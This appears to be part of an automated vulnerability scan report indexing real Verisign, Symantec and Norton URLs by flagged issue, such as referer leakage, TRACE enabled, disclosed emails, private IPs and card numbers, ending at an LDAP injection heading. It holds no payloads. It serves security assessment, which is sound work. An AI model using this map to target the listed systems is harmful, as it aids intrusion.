13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html
13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html
13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html
13.6. https://knowledge.verisign.ch/support/mpki-support/index.html
13.7. https://knowledge.verisign.ch/support/mpki-support/index.html
13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index
13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index
13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html
13.15. http://query.verisign.ch/search
13.16. http://query.verisign.ch/search
13.17. https://renewals.symantec.com/renewals/chat_form.jsp
13.18. http://www.verisign.ch/
13.19. http://www.verisign.ch/
13.20. http://www.verisign.ch/contact-information/index.html
13.21. http://www.verisign.ch/contact-information/index.html
13.22. http://www.verisign.ch/corporate/index.html
13.23. http://www.verisign.ch/corporate/index.html
13.24. http://www.verisign.ch/trust-seal/index.html
13.25. http://www.verisign.ch/trust-seal/index.html
14. Cross-domain Referer leakage
14.1. http://blogs.verisign.com/
14.2. http://buy.norton.com/estore/mf/landingProductFeatures
14.3. http://buy.norton.com/estore/mf/upgradeRenewal
14.4. http://community.norton.com/norton/
14.5. http://investor.symantec.com/phoenix.zhtml
14.6. http://investor.symantec.com/phoenix.zhtml
14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html
14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html
14.9. https://knowledge.verisign.ch/support/mpki-support/index.html
14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index
14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html
14.13. https://knowledge.verisign.com/support/code-signing-support/index
14.14. https://knowledge.verisign.com/support/code-signing-support/index.html
14.15. https://knowledge.verisign.com/support/digital-id-support/index.html
14.16. https://knowledge.verisign.com/support/eca-support/index.html
14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
14.19. https://knowledge.verisign.com/support/mpki-support/index.html
14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index
14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html
14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
14.24. http://player.ooyala.com/player.js
14.25. http://query.verisign.com/search
14.26. http://searchg.symantec.com/search
14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login
14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login
14.40. http://store.symantec.com/
14.41. https://symantec-corporation.com/servlet/campaignrespondent
14.42. https://trust-center.verisign.ch/process/retail/console_login
14.43. https://trust-center.verisign.com/process/retail/console_login
14.44. https://trust-center.verisign.com/process/retail/trust_product_selector
14.45. http://updatecenter.norton.com/
14.46. http://us.norton.com/beta/index.jsp
14.47. http://us.norton.com/beta/overview.jsp
14.48. http://us.norton.com/norton-utilities/
14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
14.50. http://us.norton.com/products/charts/comparison.jsp
14.51. http://us.norton.com/support/DIY/index.jsp
14.52. http://us.norton.com/support/dtree.jsp
14.53. http://us.norton.com/theme.jsp
14.54. http://us.norton.com/theme.jsp
14.55. http://us.norton.com/theme4.jsp
14.56. http://www.symantec.com/business/products/categories.jsp
14.57. http://www.symantec.com/business/products/purchasing.jsp
14.58. http://www.symantec.com/business/theme.jsp
14.59. http://www.symantec.com/business/verisign/fraud-detection-service
14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp
14.61. http://www.symantec.com/store/products/index.jsp
14.62. http://www.symantec.com/store/resources/index.jsp
14.63. http://www.symantec.com/store/services/index.jsp
14.64. http://www.verisign.ch/
14.65. http://www.verisign.ch/contact-information/index.html
14.66. http://www.verisign.ch/corporate/index.html
14.67. http://www.verisign.ch/trust-seal/index.html
14.68. http://www.verisign.com/code-signing/index.html
14.69. http://www.verisign.com/trust-seal/index.html
14.70. http://www.verisign.com/verisign-worldwide/index.html
15. Cross-domain script include
15.1. http://blogs.verisign.com/web-user-experience/
15.2. http://community.norton.com/norton/
15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
15.5. http://de.community.norton.com/
15.6. http://free.pctools.com/free-antivirus/
15.7. http://investor.symantec.com/phoenix.zhtml
15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html
15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html
15.10. https://knowledge.verisign.ch/support/mpki-support/index.html
15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index
15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
15.14. http://query.verisign.ch/search
15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch
15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login
15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login
15.18. http://store.symantec.com/
15.19. https://symantec-corporation.com/servlet/campaignrespondent
15.20. https://trust-center.verisign.ch/process/retail/console_login
15.21. https://trust-center.verisign.com/process/retail/console_login
15.22. https://trust-center.verisign.com/process/retail/help_and_support
15.23. https://trust-center.verisign.com/process/retail/trust_product_selector
15.24. http://us.norton.com/360
15.25. http://us.norton.com/downloads/index.jsp
15.26. http://us.norton.com/familyresources/index.jsp
15.27. http://us.norton.com/nortonlive/
15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
15.29. http://us.norton.com/products/index.jsp
15.30. http://us.norton.com/security_response/index.jsp
15.31. http://www.symantec.com/connect/
15.32. http://www.verisign.ch/
15.33. http://www.verisign.ch/contact-information/index.html
15.34. http://www.verisign.ch/corporate/index.html
15.35. http://www.verisign.ch/trust-seal/index.html
15.36. http://www.verisign.com/
15.37. http://www.verisign.com/code-signing/index.html
15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html
15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
15.42. http://www.verisign.com/trust-seal/index.html
15.43. http://www.verisign.com/verisign-worldwide/index.html
15.44. https://www.verisign.com/
15.45. https://www.verisign.com/products-services/index.html
16. TRACE method is enabled
16.1. http://1168.ic-live.com/
16.2. http://blogs.verisign.com/
16.3. https://cert.webtrust.org/
16.4. https://donate.mozilla.org/
16.5. https://partnernet.symantec.com/
16.6. http://press.verisign.com/
16.7. https://press.verisign.com/
17. Email addresses disclosed
17.1. http://blogs.verisign.com/
17.2. http://blogs.verisign.com/web-user-experience/
17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js
17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
17.5. https://enterprise-ssl-admin.verisign.com/
17.6. https://fileconnect.symantec.com/javascript/calendar2.js
17.7. https://idprotect.verisign.com/learnmore.v
17.8. https://idprotect.verisign.com/orderstart.v
17.9. https://idprotect.verisign.com/toolbar/activate.v
17.10. https://idprotect.verisign.com/toolbar/download.v
17.11. https://idprotect.verisign.com/toolbar/home.v
17.12. https://idprotect.verisign.com/toolbar/install.v
17.13. https://idprotect.verisign.com/wheretouse.v
17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html
17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html
17.16. https://knowledge.verisign.ch/support/mpki-support/index.html
17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index
17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html
17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
17.21. https://knowledge.verisign.com/support/code-signing-support/index
17.22. https://knowledge.verisign.com/support/code-signing-support/index.html
17.23. https://knowledge.verisign.com/support/digital-id-support/index.html
17.24. https://knowledge.verisign.com/support/eca-support/index.html
17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
17.28. https://knowledge.verisign.com/support/mpki-support/index.html
17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index
17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html
17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js
17.34. https://policy3.responsys.net/privacy.htm
17.35. https://press.verisign.com/easyir/customrel.do
17.36. http://query.verisign.ch/search
17.37. http://query.verisign.com/cluster.js
17.38. http://query.verisign.com/common.js
17.39. http://query.verisign.com/search
17.40. http://query.verisign.com/uri.js
17.41. https://query.verisign.com/search
17.42. https://renewals.symantec.com/renewals/chat_form.jsp
17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
17.44. http://us.norton.com/beta/overview.jsp
17.45. http://us.norton.com/familyresources/index.jsp
17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js
17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v
17.48. http://vipmobile.verisign.com/home.v
17.49. https://vipmobile.verisign.com/home.v
17.50. https://vipmobile.verisign.com/supportedphones.v
17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
17.52. http://www.symantec.com/business/theme.jsp
17.53. http://www.symantec.com/connect/
17.54. http://www.symantec.com/searchg/common.js
17.55. http://www.symantec.com/searchg/uri.js
17.56. http://www.verisign.ch/
17.57. http://www.verisign.ch/contact-information/index.html
17.58. http://www.verisign.ch/corporate/index.html
17.59. http://www.verisign.ch/trust-seal/index.html
17.60. http://www.verisign.com/
17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
17.63. http://www.verisign.com/code-signing/index.html
17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html
17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
17.68. http://www.verisign.com/trust-seal/index.html
17.69. http://www.verisign.com/verisign-worldwide/index.html
17.70. https://www.verisign.com/
17.71. https://www.verisign.com/products-services/index.html
18. Private IP addresses disclosed
18.1. http://query.verisign.com/cluster.js
18.2. http://query.verisign.com/search
18.3. https://query.verisign.com/search
19. Credit card numbers disclosed
19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf
20. Robots.txt file
20.1. http://1168.ic-live.com/goat.php
20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif
20.3. https://admin.instantservice.com/links/5851/14753
20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif
20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/
20.7. http://buy.norton.com/
20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css
20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
20.10. http://ch.norton.com/
20.11. http://com-verisign.netmng.com/
20.12. http://community.norton.com/norton/
20.13. http://de.community.norton.com/
20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
20.15. http://gs.instantservice.com/geoipAPI.js
20.16. http://investor.symantec.com/phoenix.zhtml
20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
20.18. https://knowledge.verisign.com/favicon.ico
20.19. http://l.addthiscdn.com/live/t00/200lo.gif
20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image
20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
20.22. http://partnerlocator.symantec.com/public/search
20.23. http://player.ooyala.com/player.js
20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec
20.25. https://products.geotrust.com/signup/codesign.do
20.26. https://products.verisign.com/geocenter/reseller/logon.do
20.27. http://query.verisign.ch/search
20.28. http://query.verisign.com/search
20.29. https://query.verisign.com/search
20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js
20.31. http://searchg.symantec.com/search
20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login
20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login
20.34. https://symantec-corporation.com/servlet/campaignrespondent
20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
20.36. https://test-products.verisign.com/geocenter/reseller/logon.do
20.37. https://trust-center.verisign.ch/process/retail/trust_initial
20.38. https://trust-center.verisign.com/process/retail/trust_initial
20.39. http://twitter.com/statuses/user_timeline/pctools.json
20.40. http://us.norton.com/index.jsp
20.41. https://us.norton.com/index.jsp
20.42. https://www-secure.symantec.com/feedback/webmaster.jsp
20.43. http://www.google-analytics.com/__utm.gif
20.44. http://www.symantec.com/scripts/swfobject.js
20.45. http://www.verisign.ch/
20.46. http://www.verisign.com/
20.47. https://www.verisign.com/products/site/
21. Cacheable HTTPS response
21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
21.14. https://cert.webtrust.org/ViewSeal
21.15. https://fileconnect.symantec.com/
21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
21.17. https://idprotect.verisign.com/common/scripts/dlText.js
21.18. https://idprotect.verisign.com/secureredirect.v
21.19. https://idprotect.verisign.com/toolbar/downloadIE.v
21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html
21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html
21.22. https://knowledge.verisign.ch/support/mpki-support/index.html
21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html
21.26. https://knowledge.verisign.com/favicon.ico
21.27. https://knowledge.verisign.com/support/code-signing-support/index
21.28. https://knowledge.verisign.com/support/code-signing-support/index.html
21.29. https://knowledge.verisign.com/support/digital-id-support/index.html
21.30. https://knowledge.verisign.com/support/eca-support/index.html
21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
21.33. https://knowledge.verisign.com/support/mpki-support/index.html
21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index
21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html
21.37. https://partnernet.symantec.com/
21.38. https://policy3.responsys.net/
21.39. https://policy3.responsys.net/permission.htm
21.40. https://policy3.responsys.net/privacy.htm
21.41. https://press.verisign.com/easyir/customrel.do
21.42. https://products.verisign.com/geocenter/reseller/doregister.do
21.43. https://products.verisign.com/geocenter/reseller/logon.do
21.44. https://products.verisign.com/geocenter/reseller/logon.jsp
21.45. https://products.verisign.com/geocenter/reseller/register.do
21.46. https://query.verisign.com/search
21.47. https://renewals.symantec.com/renewals/application
21.48. https://renewals.symantec.com/renewals/chat_form.jsp
21.49. https://renewals.symantec.com/renewals/chat_norton.jsp
21.50. https://renewals.symantec.com/renewals/renewal_search.jsp
21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp
21.52. https://seal.verisign.com/getseal
21.53. https://securitycenter.verisign.com/
21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch
21.55. https://test-products.verisign.com/geocenter/reseller/logon.do
21.56. https://us.norton.com/index.jsp
21.57. https://vipmobile.verisign.com/home.v
21.58. https://vipmobile.verisign.com/supportedphones.v
21.59. https://www-secure.symantec.com/
21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp
21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
21.63. https://www-secure.symantec.com/business/theme.jsp
21.64. https://www-secure.symantec.com/feedback/contactus.jsp
21.65. https://www-secure.symantec.com/feedback/webmaster.jsp
21.66. https://www-secure.symantec.com/globalsites/index.jsp
21.67. https://www-secure.symantec.com/index.jsp
21.68. https://www-secure.symantec.com/rss/index.jsp
21.69. https://www-secure.symantec.com/sitemap/index.jsp
21.70. https://www.verisign.com/
21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
21.73. https://www.verisign.com/products-services/index.html
22. HTML does not specify charset
22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
22.18. https://cert.webtrust.org/ViewSeal
22.19. https://enterprise-ssl-admin.verisign.com/
22.20. https://fileconnect.symantec.com/
22.21. https://fileconnect.symantec.com/favicon.ico
22.22. https://fileconnect.symantec.com/javascript/common.js
22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
22.24. https://knowledge.verisign.com/support/code-signing-support/index
22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index
22.27. http://partnerlocator.symantec.com/
22.28. http://partnerlocator.symantec.com/public/product_finder
22.29. http://partnerlocator.symantec.com/public/pulldown_list
22.30. http://partnerlocator.symantec.com/public/search
22.31. https://partnernet.symantec.com/
22.32. http://player.ooyala.com/info/primary/
22.33. https://policy3.responsys.net/
22.34. https://renewals.symantec.com/renewals/chat_norton.jsp
22.35. https://securitycenter.verisign.com/
22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus
22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch
22.38. https://securitycenter.verisign.com/celp/enroll/retail
22.39. https://securitycenter.verisign.com/celp/enroll/upsell
22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
22.41. http://www.verisign.ch/
22.42. http://www.verisign.ch/assets/global/js/leftnav.js
22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js
22.45. http://www.verisign.ch/corporate/index.html
22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
22.48. http://www.verisign.com/
22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js
22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
22.61. https://www.verisign.com/
22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
23. Content type incorrectly stated
23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
23.22. https://cert.webtrust.org/ViewSeal
23.23. http://com-verisign.netmng.com/
23.24. https://fileconnect.symantec.com/images/Sigstand.jpg
23.25. http://free.pctools.com/favicon.ico
23.26. http://gs.instantservice.com/geoipAPI.js
23.27. https://idprotect.verisign.com/common/scripts/dlText.js
23.28. https://idprotect.verisign.com/imageapp.v
23.29. https://idprotect.verisign.com/membersites.v
23.30. https://knowledge.verisign.com/favicon.ico
23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard
23.32. http://partnerlocator.symantec.com/public/product_finder
23.33. http://partnerlocator.symantec.com/public/pulldown_list
23.34. http://player.ooyala.com/info/primary/
23.35. http://player.ooyala.com/sas/authorized
23.36. http://query.verisign.com/cluster
23.37. http://sales.liveperson.net/hcp/html/mTag.js
23.38. https://seal.verisign.com/getseal
23.39. http://sr2.liveperson.net/hcp/html/mTag.js
23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico
23.41. http://www.symantec.com/s/searchg/suggest
23.42. http://www.symantec.com/search/searchjs.jsp
23.43. http://www.verisign.ch/assets/global/js/leftnav.js
23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js
23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js
23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg
23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
24. Content type is not specified
24.1. https://fileconnect.symantec.com/javascript/calendar2.js
24.2. https://fileconnect.symantec.com/javascript/s_code.js
24.3. https://fileconnect.symantec.com/javascript/validations.js
24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
24.5. http://l.player.ooyala.com/verify
24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js
24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js
24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js
24.10. https://renewals.symantec.com/renewals/js/getPageNames.js
24.11. https://renewals.symantec.com/renewals/js/modal.js
24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js
24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js
24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js
24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
24.16. http://us.norton.com/www-uat.ges.sym
24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
24.19. http://www.symantec.com/business/verisign/fraud-detection-service
1. LDAP injection
There are 12 instances of this issue:
Issue background
